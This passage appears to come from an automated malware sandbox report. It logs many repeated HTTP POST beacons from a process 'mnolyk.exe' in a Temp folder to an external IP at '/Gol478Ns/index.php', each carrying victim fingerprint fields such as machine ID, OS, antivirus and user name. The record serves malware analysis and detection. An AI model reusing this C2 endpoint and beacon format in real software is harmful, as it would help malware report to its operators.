                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:41.125665903 CET   453   IN   HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:41 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID   Source IP   Source Port   Destination IP   Destination Port   Process
                            265   192.168.2.4   49960   62.204.41.4   80   C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp   kBytes transferred   Direction   Data
                            Feb 8, 2023 17:38:41.382110119 CET   454   OUT   POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:41.445076942 CET   454   IN   HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:41 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID   Source IP   Source Port   Destination IP   Destination Port   Process
                            266   192.168.2.4   49961   62.204.41.4   80   C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp   kBytes transferred   Direction   Data
                            Feb 8, 2023 17:38:41.634573936 CET   455   OUT   POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:41.698961020 CET   455   IN   HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:41 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID   Source IP   Source Port   Destination IP   Destination Port   Process
                            267   192.168.2.4   49962   62.204.41.4   80   C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp   kBytes transferred   Direction   Data
                            Feb 8, 2023 17:38:41.870044947 CET   456   OUT   POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:41.935138941 CET   456   IN   HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:41 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID   Source IP   Source Port   Destination IP   Destination Port   Process
                            268   192.168.2.4   49963   62.204.41.4   80   C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp   kBytes transferred   Direction   Data
                            Feb 8, 2023 17:38:45.131886005 CET   457   OUT   POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:45.198563099 CET   457   IN   HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:45 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID   Source IP   Source Port   Destination IP   Destination Port   Process
                            269   192.168.2.4   49964   62.204.41.4   80   C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp   kBytes transferred   Direction   Data
                            Feb 8, 2023 17:38:45.382356882 CET   458   OUT   POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:45.446559906 CET   458   IN   HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:45 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID   Source IP   Source Port   Destination IP   Destination Port   Process
                            27   192.168.2.4   49722   62.204.41.4   80   C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp   kBytes transferred   Direction   Data
                            Feb 8, 2023 17:37:31.299530983 CET   216   OUT   POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:31.361973047 CET   216   IN   HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:31 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID   Source IP   Source Port   Destination IP   Destination Port   Process
                            270   192.168.2.4   49965   62.204.41.4   80   C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp   kBytes transferred   Direction   Data
                            Feb 8, 2023 17:38:45.617119074 CET   459   OUT   POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:45.680779934 CET   459   IN   HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:45 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID   Source IP   Source Port   Destination IP   Destination Port   Process
                            271   192.168.2.4   49966   62.204.41.4   80   C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp   kBytes transferred   Direction   Data
                            Feb 8, 2023 17:38:45.850941896 CET   460   OUT   POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:45.915455103 CET   460   IN   HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:45 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID   Source IP   Source Port   Destination IP   Destination Port   Process
                            272   192.168.2.4   49967   62.204.41.4   80   C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp   kBytes transferred   Direction   Data
                            Feb 8, 2023 17:38:46.093677044 CET   461   OUT   POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:46.159827948 CET   461   IN   HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:46 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID   Source IP   Source Port   Destination IP   Destination Port   Process
                            273   192.168.2.4   49968   62.204.41.4   80   C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp   kBytes transferred   Direction   Data
                            Feb 8, 2023 17:38:46.334913969 CET   462   OUT   POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:46.401207924 CET   462   IN   HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:46 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID   Source IP   Source Port   Destination IP   Destination Port   Process
                            274   192.168.2.4   49969   62.204.41.4   80   C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp   kBytes transferred   Direction   Data
                            Feb 8, 2023 17:38:46.576219082 CET   463   OUT   POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:46.640360117 CET   463   IN   HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:46 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID   Source IP   Source Port   Destination IP   Destination Port   Process
                            275   192.168.2.4   49970   62.204.41.4   80   C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp   kBytes transferred   Direction   Data
                            Feb 8, 2023 17:38:46.821273088 CET   464   OUT   POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:46.884483099 CET   464   IN   HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:46 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID   Source IP   Source Port   Destination IP   Destination Port   Process
                            276   192.168.2.4   49971   62.204.41.4   80   C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp   kBytes transferred   Direction   Data
                            Feb 8, 2023 17:38:47.051645994 CET   465   OUT   POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:47.115789890 CET   465   IN   HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:47 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID   Source IP   Source Port   Destination IP   Destination Port   Process
                            277   192.168.2.4   49972   62.204.41.4   80   C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp   kBytes transferred   Direction   Data
                            Feb 8, 2023 17:38:47.288532019 CET   466   OUT   POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:47.353888035 CET   466   IN   HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:47 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID   Source IP   Source Port   Destination IP   Destination Port   Process
                            278   192.168.2.4   49973   62.204.41.4   80   C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp   kBytes transferred   Direction   Data
                            Feb 8, 2023 17:38:47.525350094 CET   467   OUT   POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:47.589066982 CET   467   IN   HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:47 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID   Source IP   Source Port   Destination IP   Destination Port   Process
                            279   192.168.2.4   49974   62.204.41.4   80   C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp   kBytes transferred   Direction   Data
                            Feb 8, 2023 17:38:47.760274887 CET   468   OUT   POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:47.825783014 CET   468   IN   HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:47 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID   Source IP   Source Port   Destination IP   Destination Port   Process
                            28   192.168.2.4   49723   62.204.41.4   80   C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp   kBytes transferred   Direction   Data
                            Feb 8, 2023 17:37:31.619066000 CET   217   OUT   POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:31.682921886 CET   217   IN   HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:31 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID   Source IP   Source Port   Destination IP   Destination Port   Process
                            280   192.168.2.4   49975   62.204.41.4   80   C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp   kBytes transferred   Direction   Data
                            Feb 8, 2023 17:38:47.996045113 CET   468   OUT   POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:48.062268972 CET  469                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:48 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            281         192.168.2.4  49976        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:38:48.242352962 CET  470                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:48.308260918 CET  470                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:48 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            282         192.168.2.4  49977        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:38:48.476007938 CET  471                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:48.541361094 CET  471                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:48 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
